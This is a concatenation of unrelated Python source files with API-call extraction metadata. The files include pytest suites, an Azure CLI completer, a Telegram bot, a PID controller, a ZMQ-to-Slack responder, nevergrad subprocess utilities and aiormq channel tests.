] | [((110, 129), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (127, 129), False, 'import logging\n'), ((145, 168), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (166, 168), False, 'import logging\n'), ((351, 401), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$', travis_tag)\n", (359, 401), False, 'import re\n'), ((622, 669), 'os.path.join', 'os.path.join', (['root_dir', '"""lbry"""', '"""build_type.py"""'], {}), "(root_dir, 'lbry', 'build_type.py')\n", (634, 669), False, 'import os\n'), ((427, 471), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$', travis_tag)\n", (435, 471), False, 'import re\n'), ((820, 854), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_TAG"""', 'None'], {}), "('TRAVIS_TAG', None)\n", (834, 854), False, 'import os\n'), ((571, 597), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (587, 597), False, 'import os\n')] |
"""Collection of tests."""
import pytest
import dblib.lib
f0 = dblib.lib.Finding('CD spook', 'my_PC', 'The CD drive is missing.')
f1 = dblib.lib.Finding('Unplugged', 'my_PC', 'The power cord is unplugged.')
f2 = dblib.lib.Finding('Monitor switched off', 'my_PC', 'The monitor is switched off.')
def test_add_remove():
"""Test function."""
db = dblib.lib.BackyardDB()
# regular cases
db.add(f0)
assert f0 in db.findings
assert len(db.findings) == 1
db.add(f1)
assert f1 in db.findings
assert len(db.findings) == 2
db.add(f2)
assert f2 in db.findings
assert len(db.findings) == 3
db.add(None)
assert len(db.findings) == 3
db.remove(f1)
assert f1 not in db.findings
assert len(db.findings) == 2
# test exceptions
with pytest.raises(TypeError):
db.add(1)
def test_update():
"""Test function."""
db = dblib.lib.BackyardDB()
db.add(f0)
db.add(f1)
db.update(f1, f2)
assert f2 in db.findings
assert len(db.findings) == 2
| [
"pytest.raises"
] | [((797, 821), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (810, 821), False, 'import pytest\n')] |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.decorators import Completer
from azure.cli.core.commands.client_factory import get_subscription_id
from ._client_factory import cf_policy_insights
@Completer
def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx)
sub = get_subscription_id(cmd.cli_ctx)
rg = getattr(namespace, 'resource_group_name', None)
management_group = getattr(namespace, 'management_group_name', None)
if rg:
result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg)
elif management_group:
result = client.remediations.list_for_management_group(management_group_id=management_group)
else:
result = client.remediations.list_for_subscription(subscription_id=sub)
return [i.name for i in result]
@Completer
def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx).policy_metadata
from azure.mgmt.policyinsights.models import QueryOptions
query_options = QueryOptions(top=2000)
return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
| [
"azure.cli.core.commands.client_factory.get_subscription_id",
"azure.mgmt.policyinsights.models.QueryOptions"
] | [((695, 727), 'azure.cli.core.commands.client_factory.get_subscription_id', 'get_subscription_id', (['cmd.cli_ctx'], {}), '(cmd.cli_ctx)\n', (714, 727), False, 'from azure.cli.core.commands.client_factory import get_subscription_id\n'), ((1497, 1519), 'azure.mgmt.policyinsights.models.QueryOptions', 'QueryOptions', ([], {'top': '(2000)'}), '(top=2000)\n', (1509, 1519), False, 'from azure.mgmt.policyinsights.models import QueryOptions\n')] |
from aiogram import Bot, types
from aiogram.dispatcher import Dispatcher
from aiogram.utils import executor
TOKEN = "Token for you bot"
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(command=['start', 'help'])
async def send_welcome(msg: types.Message):
await msg.reply_to_message(f'Добро пожаловать,{msg.from_user.first_name}')
@dp.message_handler(content_types=['text'])
async def get_text_messages(msg: types.Message):
if msg.text.lower() == 'привет':
await msg.answer('Привет!')
else:
await msg.answer('Я не понимаю')
if __name__ == '__main__':
executor.start_polling(dp) | [
"aiogram.Bot",
"aiogram.dispatcher.Dispatcher",
"aiogram.utils.executor.start_polling"
] | [((146, 162), 'aiogram.Bot', 'Bot', ([], {'token': 'TOKEN'}), '(token=TOKEN)\n', (149, 162), False, 'from aiogram import Bot, types\n'), ((169, 184), 'aiogram.dispatcher.Dispatcher', 'Dispatcher', (['bot'], {}), '(bot)\n', (179, 184), False, 'from aiogram.dispatcher import Dispatcher\n'), ((620, 646), 'aiogram.utils.executor.start_polling', 'executor.start_polling', (['dp'], {}), '(dp)\n', (642, 646), False, 'from aiogram.utils import executor\n')] |
# timedpid.py
# Source: https://github.com/DrGFreeman/PyTools
#
# MIT License
#
# Copyright (c) 2017 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This module defines a simple Proportional - Integral - Derivative (PID)
# controller with different time step calculation methods. This is a python
# implementation of my Arduino TimedPID library which can be found at
# https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed
# documentation.
import time
class TimedPID:
# Constructor
def __init__(self, kp = 1., ki = 0., kd = 0.):
self._kp = kp
self._ki = ki
self._kd = kd
self._cmdMin = None
self._cmdMax = None
self._boundRange = False
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
def getCmd(self, setPoint, procVar):
"""Gets the PID command without time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled.
No time step is used (assumed = 1)."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += error
errorDerivative = error - self._errorPrevious
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def getCmdAutoStep(self, setPoint, procVar):
"""Gets the PID command with automatic time step calculation.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
The time step is calculated as the time since the last call to the
method."""
# Calculate time step
currentTime = time.time()
timeStep = currentTime - self._lastCmdTime
# Set last time method was called to current time
self._lastCmdTime = currentTime
# Get command
return self.getCmdStep(setPoint, procVar, timeStep)
def getCmdStep(self, setPoint, procVar, timeStep):
"""Gets the PID command with a specified time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
timeStep is the time step."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep
errorDerivative = (error - self._errorPrevious) / timeStep
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def setCmdRange(self, cmdMin, cmdMax):
"""Sets the maximum command range. Commands calculated outside the
cmdMin and cmdMax will be set to cmdMin or cmdMax respectively."""
self._cmdMin = cmdMin
self._cmdMax = cmdMax
self._boundRange = True
def setGains(self, kp = 1., ki = 0., kd = 0.):
"""Sets the proportional, integral and derivative terms."""
self._kp = kp
self._ki = ki
self._kd = kd
def reset(self):
"""Resets the PID error terms and timer."""
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
# Private methods
def _boundCmd(self, cmd):
"""Bounds the command within the range _cmdMin to _cmdMax."""
if self._boundRange:
if cmd < self._cmdMin:
cmd = self._cmdMin
elif cmd > self._cmdMax:
cmd = self._cmdMax
return cmd
| [
"time.time"
] | [((1842, 1853), 'time.time', 'time.time', ([], {}), '()\n', (1851, 1853), False, 'import time\n'), ((2962, 2973), 'time.time', 'time.time', ([], {}), '()\n', (2971, 2973), False, 'import time\n'), ((4624, 4635), 'time.time', 'time.time', ([], {}), '()\n', (4633, 4635), False, 'import time\n')] |
#
# -*- coding: utf-8-*-
# receives messages via zmq and executes some simple
# operations.
#
# (c) ISC Clemenz & Weinbrecht GmbH 2018
#
import json
import requests
import zmq
import pmon
class ZmqResponder(object):
context = None
socket = None
def __init__(self):
"""
Constructor.
"""
self.cfg = pmon.CFG
self.log = pmon.LOG
def __enter__(self):
self.bind()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def bind(self):
self.log.info("Binding ZMQ")
port = self.cfg['pmon']['zmq.port']
bind_str = "tcp://*:{0}".format(port)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
self.socket.bind(bind_str)
def done(self):
self.log.info("Disconnecting ZMQ")
if self.socket is not None:
self.socket.close()
if self.context is not None:
self.context.term()
def _read_message(self):
self.log.debug("Wait for incoming message")
msg = self.socket.recv()
_msg = msg.decode('utf-8')
return json.loads(_msg)
@staticmethod
def _make_slack_payload(message):
slack_payload = dict()
slack_payload['text'] = message['msg']
attachments = list()
slack_payload['attachments'] = attachments
attachment = dict()
attachment["fallback"] = message['msg']
attachment['text'] = message['msg']
attachment['title'] = message['msg.type']
attachment['author_name'] = message['from']
attachments.append(attachment)
return slack_payload
def _report_message_to_slack(self, message):
"""
Send a message to Slack Web-Hook.
:param message: the message record to be send to slack
:return: None
"""
self.log.debug("Forwarding message to slack")
url = self.cfg['pmon']['slack.hook']
payload = json.dumps(self._make_slack_payload(message))
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'Content-Encoding': 'utf8',
'Content-Length': str(len(payload))}
try:
rsp = requests.post(url, data=payload, headers=headers)
if rsp.status_code != requests.codes.ok:
self.log.warn("problem sending to slack: {0}".format(rsp.status_code))
except Exception as x:
self.log.error(str(x))
def respond(self):
go_on = True
while go_on:
message = self._read_message()
self.log.debug("Message: {0}, {1}".format(message['msg.type'],
message['msg']))
self.socket.send_string('ACK')
try:
self._report_message_to_slack(message)
except Exception as x:
self.log.error(str(x))
go_on = True if message['msg'] != 'stop' else False
| [
"json.loads",
"requests.post",
"zmq.Context"
] | [((693, 707), 'zmq.Context', 'zmq.Context', (['(1)'], {}), '(1)\n', (704, 707), False, 'import zmq\n'), ((1160, 1176), 'json.loads', 'json.loads', (['_msg'], {}), '(_msg)\n', (1170, 1176), False, 'import json\n'), ((2287, 2336), 'requests.post', 'requests.post', (['url'], {'data': 'payload', 'headers': 'headers'}), '(url, data=payload, headers=headers)\n', (2300, 2336), False, 'import requests\n')] |
# coding: utf-8
#just prints the emails of members of a group to stdout,
#both primary and secondary members
# run as
# $python extractemails_nogui.py "Tidal Disruption Events"
from __future__ import print_function
'__author__' == '<NAME>, NYU - GitHub: fedhere'
import sys
import pandas as pd
from argparse import ArgumentParser
from config import tvsfile
def parse_args(subglist):
""" Use ArgParser to build up the arguments we will use in our script
"""
stored_args = {}
# get the script name without the extension & use it to build up
# the json filename
parser = ArgumentParser(description='Selecting members by subgroup')
parser.add_argument('subgroup',
action='store',
default=None,
help='Choose the subgroup affiliation:' +
' -- '.join([s for s in subglist]))
args = parser.parse_args()
return args
if __name__ == '__main__':
if tvsfile is None:
print ("Required Argument: Google Doc file identifier (if you do not have it email federica!)")
sys.exit()
TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' +
tvsfile +
'/export?gid=0&format=csv',
index_col=0)
subgroups = TVSMembers.primary.unique()
conf = parse_args([x for x in subgroups if str(x) != 'nan'])
primary = conf.subgroup
secondary = conf.subgroup
emails = TVSMembers[TVSMembers.primary == primary]['email'].values
print ("These are the members with primary affiliation with " + primary)
print ("")
print (' '.join([em + ','for em in emails]))
emails = TVSMembers[(TVSMembers.secondary == secondary) | (TVSMembers['secondary.1'] == secondary) | (TVSMembers['secondary.2'] == secondary)]['email'].values
print ("\n")
print ("These are the members with secondary affiliation with " + secondary)
print ("")
print (' '.join([em + ','for em in emails]))
print ("")
print ("If you also want their names and affiliations use: ")
print ("$python extractemailsW.py " + conf.subgroup)
| [
"sys.exit",
"argparse.ArgumentParser",
"pandas.read_csv"
] | [((595, 654), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Selecting members by subgroup"""'}), "(description='Selecting members by subgroup')\n", (609, 654), False, 'from argparse import ArgumentParser\n'), ((1138, 1248), 'pandas.read_csv', 'pd.read_csv', (["('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv')"], {'index_col': '(0)'}), "('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv', index_col=0)\n", (1149, 1248), True, 'import pandas as pd\n'), ((1109, 1119), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1117, 1119), False, 'import sys\n')] |
import pytest
from duckql.properties import Null
@pytest.fixture(scope="module")
def valid_instance() -> Null:
return Null()
def test_string(valid_instance: Null):
assert str(valid_instance) == 'NULL'
def test_obj(valid_instance: Null):
assert valid_instance.obj == 'properties.Null'
def test_json_parse(valid_instance: Null):
assert valid_instance.json() == '{"obj": "properties.Null"}'
| [
"pytest.fixture",
"duckql.properties.Null"
] | [((53, 83), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (67, 83), False, 'import pytest\n'), ((125, 131), 'duckql.properties.Null', 'Null', ([], {}), '()\n', (129, 131), False, 'from duckql.properties import Null\n')] |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import shutil
import tempfile
import subprocess
import typing as tp
from pathlib import Path
from nevergrad.common import tools as ngtools
class Descriptors:
"""Provides access to a set of descriptors for the parametrization
This can be used within optimizers.
""" # TODO add repr
# pylint: disable=too-many-arguments
def __init__(
self,
deterministic: bool = True,
deterministic_function: bool = True,
monoobjective: bool = True,
not_manyobjective: bool = True,
continuous: bool = True,
metrizable: bool = True,
ordered: bool = True,
) -> None:
self.deterministic = deterministic
self.deterministic_function = deterministic_function
self.continuous = continuous
self.metrizable = metrizable
self.ordered = ordered
self.monoobjective = monoobjective
self.not_manyobjective = not_manyobjective
def __and__(self, other: "Descriptors") -> "Descriptors":
values = {field: getattr(self, field) & getattr(other, field) for field in self.__dict__}
return Descriptors(**values)
def __repr__(self) -> str:
diff = ",".join(f"{x}={y}" for x, y in sorted(ngtools.different_from_defaults(instance=self, check_mismatches=True).items()))
return f"{self.__class__.__name__}({diff})"
class NotSupportedError(RuntimeError):
"""This type of operation is not supported by the parameter.
"""
class TemporaryDirectoryCopy(tempfile.TemporaryDirectory): # type: ignore
"""Creates a full copy of a directory inside a temporary directory
This class can be used as TemporaryDirectory but:
- the created copy path is available through the copyname attribute
- the contextmanager returns the clean copy path
- the directory where the temporary directory will be created
can be controlled through the CLEAN_COPY_DIRECTORY environment
variable
"""
key = "CLEAN_COPY_DIRECTORY"
@classmethod
def set_clean_copy_environment_variable(cls, directory: tp.Union[Path, str]) -> None:
"""Sets the CLEAN_COPY_DIRECTORY environment variable in
order for subsequent calls to use this directory as base for the
copies.
"""
assert Path(directory).exists(), "Directory does not exist"
os.environ[cls.key] = str(directory)
# pylint: disable=redefined-builtin
def __init__(self, source: tp.Union[Path, str], dir: tp.Optional[tp.Union[Path, str]] = None) -> None:
if dir is None:
dir = os.environ.get(self.key, None)
super().__init__(prefix="tmp_clean_copy_", dir=dir)
self.copyname = Path(self.name) / Path(source).name
shutil.copytree(str(source), str(self.copyname))
def __enter__(self) -> Path:
super().__enter__()
return self.copyname
class FailedJobError(RuntimeError):
"""Job failed during processing
"""
class CommandFunction:
"""Wraps a command as a function in order to make sure it goes through the
pipeline and notify when it is finished.
The output is a string containing everything that has been sent to stdout
Parameters
----------
command: list
command to run, as a list
verbose: bool
prints the command and stdout at runtime
cwd: Path/str
path to the location where the command must run from
Returns
-------
str
Everything that has been sent to stdout
"""
def __init__(self, command: tp.List[str], verbose: bool = False, cwd: tp.Optional[tp.Union[str, Path]] = None,
env: tp.Optional[tp.Dict[str, str]] = None) -> None:
if not isinstance(command, list):
raise TypeError("The command must be provided as a list")
self.command = command
self.verbose = verbose
self.cwd = None if cwd is None else str(cwd)
self.env = env
def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> str:
"""Call the cammand line with addidional arguments
The keyword arguments will be sent as --{key}={val}
The logs are bufferized. They will be printed if the job fails, or sent as output of the function
Errors are provided with the internal stderr
"""
# TODO make the following command more robust (probably fails in multiple cases)
full_command = self.command + [str(x) for x in args] + ["--{}={}".format(x, y) for x, y in kwargs.items()]
if self.verbose:
print(f"The following command is sent: {full_command}")
outlines: tp.List[str] = []
with subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=False, cwd=self.cwd, env=self.env) as process:
try:
assert process.stdout is not None
for line in iter(process.stdout.readline, b''):
if not line:
break
outlines.append(line.decode().strip())
if self.verbose:
print(outlines[-1], flush=True)
except Exception: # pylint: disable=broad-except
process.kill()
process.wait()
raise FailedJobError("Job got killed for an unknown reason.")
stderr = process.communicate()[1] # we already got stdout
stdout = "\n".join(outlines)
retcode = process.poll()
if stderr and (retcode or self.verbose):
print(stderr.decode(), file=sys.stderr)
if retcode:
subprocess_error = subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
raise FailedJobError(stderr.decode()) from subprocess_error
return stdout
| [
"pathlib.Path",
"subprocess.Popen",
"subprocess.CalledProcessError",
"os.environ.get",
"nevergrad.common.tools.different_from_defaults"
] | [((2787, 2817), 'os.environ.get', 'os.environ.get', (['self.key', 'None'], {}), '(self.key, None)\n', (2801, 2817), False, 'import os\n'), ((2902, 2917), 'pathlib.Path', 'Path', (['self.name'], {}), '(self.name)\n', (2906, 2917), False, 'from pathlib import Path\n'), ((4849, 4973), 'subprocess.Popen', 'subprocess.Popen', (['full_command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)', 'cwd': 'self.cwd', 'env': 'self.env'}), '(full_command, stdout=subprocess.PIPE, stderr=subprocess.\n PIPE, shell=False, cwd=self.cwd, env=self.env)\n', (4865, 4973), False, 'import subprocess\n'), ((2499, 2514), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (2503, 2514), False, 'from pathlib import Path\n'), ((2920, 2932), 'pathlib.Path', 'Path', (['source'], {}), '(source)\n', (2924, 2932), False, 'from pathlib import Path\n'), ((5876, 5963), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', (['retcode', 'process.args'], {'output': 'stdout', 'stderr': 'stderr'}), '(retcode, process.args, output=stdout, stderr=\n stderr)\n', (5905, 5963), False, 'import subprocess\n'), ((1445, 1514), 'nevergrad.common.tools.different_from_defaults', 'ngtools.different_from_defaults', ([], {'instance': 'self', 'check_mismatches': '(True)'}), '(instance=self, check_mismatches=True)\n', (1476, 1514), True, 'from nevergrad.common import tools as ngtools\n')] |
# coding=utf-8
"""
Internal tools for NimLime development & testing.
"""
from pprint import pprint
import sublime
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from functools import wraps
from pstats import Stats
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
debug_on = False
if debug_on:
sublime.message_dialog("NimLime running in debug mode.")
# Debug printer
def print_debug(*args, **kwargs):
"""
Print when debugging.
:type args: Any
:type kwargs: Any
"""
if debug_on:
pprint(*args, **kwargs)
# Profiling functions
profiler = Profile()
profiler_running = False
def profile_func(func):
"""
Decorator which profiles a single function.
Call print_profile_data to print the collected data.
:type func: Callable
:rtype: Callable
"""
@wraps(func)
def _profile_wrapper(*args, **kwargs):
global profiler_running
if not profiler_running:
profiler_running = True
try:
profiler.enable()
return func(*args, **kwargs)
finally:
profiler.disable()
profiler_running = False
return _profile_wrapper
def print_profile_data():
"""
Print the collected profile data.
"""
stream = StringIO()
statistics = Stats(profiler, stream=stream)
statistics.sort_stats('cumulative')
statistics.print_stats()
print(stream.getvalue())
| [
"profile.Profile",
"functools.wraps",
"pstats.Stats",
"sublime.message_dialog",
"io.StringIO",
"pprint.pprint"
] | [((658, 667), 'profile.Profile', 'Profile', ([], {}), '()\n', (665, 667), False, 'from profile import Profile\n'), ((382, 438), 'sublime.message_dialog', 'sublime.message_dialog', (['"""NimLime running in debug mode."""'], {}), "('NimLime running in debug mode.')\n", (404, 438), False, 'import sublime\n'), ((892, 903), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (897, 903), False, 'from functools import wraps\n'), ((1365, 1375), 'io.StringIO', 'StringIO', ([], {}), '()\n', (1373, 1375), False, 'from io import StringIO\n'), ((1393, 1423), 'pstats.Stats', 'Stats', (['profiler'], {'stream': 'stream'}), '(profiler, stream=stream)\n', (1398, 1423), False, 'from pstats import Stats\n'), ((600, 623), 'pprint.pprint', 'pprint', (['*args'], {}), '(*args, **kwargs)\n', (606, 623), False, 'from pprint import pprint\n')] |
import orjson
from asynctest import TestCase, Mock, patch
from freezegun import freeze_time
from driftage.monitor import Monitor
class TestMonitor(TestCase):
def setUp(self):
self.monitor = Monitor(
"user_test@local", "<PASSWORD>", "identif"
)
def tearDown(self):
self.monitor.container.stop()
def test_should_set_identifier_or_agent_name(self):
self.assertEqual(
self.monitor._identifier,
"identif"
)
monitor = Monitor(
"user_test2@local", "<PASSWORD>"
)
self.assertEqual(
monitor._identifier,
"user_test2"
)
monitor.container.stop()
@patch("driftage.monitor.WaitMonitorSubscriptions")
async def test_should_add_subscription_behaviour(self, behaviour_mock):
self.monitor.add_behaviour = Mock()
await self.monitor.setup()
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock()
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor.collect({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data_with_call(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
| [
"asynctest.Mock",
"asynctest.patch",
"driftage.monitor.Monitor",
"freezegun.freeze_time",
"orjson.dumps"
] | [((711, 761), 'asynctest.patch', 'patch', (['"""driftage.monitor.WaitMonitorSubscriptions"""'], {}), "('driftage.monitor.WaitMonitorSubscriptions')\n", (716, 761), False, 'from asynctest import TestCase, Mock, patch\n'), ((1022, 1047), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1033, 1047), False, 'from freezegun import freeze_time\n'), ((1053, 1097), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1058, 1097), False, 'from asynctest import TestCase, Mock, patch\n'), ((1103, 1137), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1108, 1137), False, 'from asynctest import TestCase, Mock, patch\n'), ((1776, 1801), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1787, 1801), False, 'from freezegun import freeze_time\n'), ((1807, 1851), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1812, 1851), False, 'from asynctest import TestCase, Mock, patch\n'), ((1857, 1891), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1862, 1891), False, 'from asynctest import TestCase, Mock, patch\n'), ((206, 257), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test@local"""', '"""<PASSWORD>"""', '"""identif"""'], {}), "('user_test@local', '<PASSWORD>', 'identif')\n", (213, 257), False, 'from driftage.monitor import Monitor\n'), ((514, 555), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test2@local"""', '"""<PASSWORD>"""'], {}), "('user_test2@local', '<PASSWORD>')\n", (521, 555), False, 'from driftage.monitor import Monitor\n'), ((875, 881), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (879, 881), False, 'from asynctest import TestCase, Mock, patch\n'), ((1274, 1280), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (1278, 1280), False, 'from asynctest import TestCase, Mock, patch\n'), ((2038, 2044), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (2042, 2044), False, 'from asynctest import TestCase, Mock, patch\n'), ((1542, 1649), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (1554, 1649), False, 'import orjson\n'), ((2298, 2405), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (2310, 2405), False, 'import orjson\n')] |
import asyncio
import uuid
import pytest
from aiomisc_pytest.pytest_plugin import TCPProxy
import aiormq
async def test_simple(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"foo",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b"foo"
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
async def test_blank_body(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b""
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
@pytest.mark.no_catch_loop_exceptions
async def test_bad_consumer(amqp_channel: aiormq.Channel, loop):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare()
future = loop.create_future()
await channel.basic_publish(b"urgent", routing_key=declare_ok.queue)
consumer_tag = loop.create_future()
async def bad_consumer(message):
await channel.basic_cancel(await consumer_tag)
future.set_result(message)
raise Exception
consume_ok = await channel.basic_consume(
declare_ok.queue, bad_consumer, no_ack=False,
)
consumer_tag.set_result(consume_ok.consumer_tag)
message = await future
await channel.basic_reject(message.delivery.delivery_tag, requeue=True)
assert message.body == b"urgent"
future = loop.create_future()
await channel.basic_consume(
declare_ok.queue, future.set_result, no_ack=True,
)
message = await future
assert message.body == b"urgent"
async def test_ack_nack_reject(amqp_channel: aiormq.Channel):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare(auto_delete=True)
queue = asyncio.Queue()
await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False)
await channel.basic_publish(b"rejected", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"rejected"
await channel.basic_reject(message.delivery.delivery_tag, requeue=False)
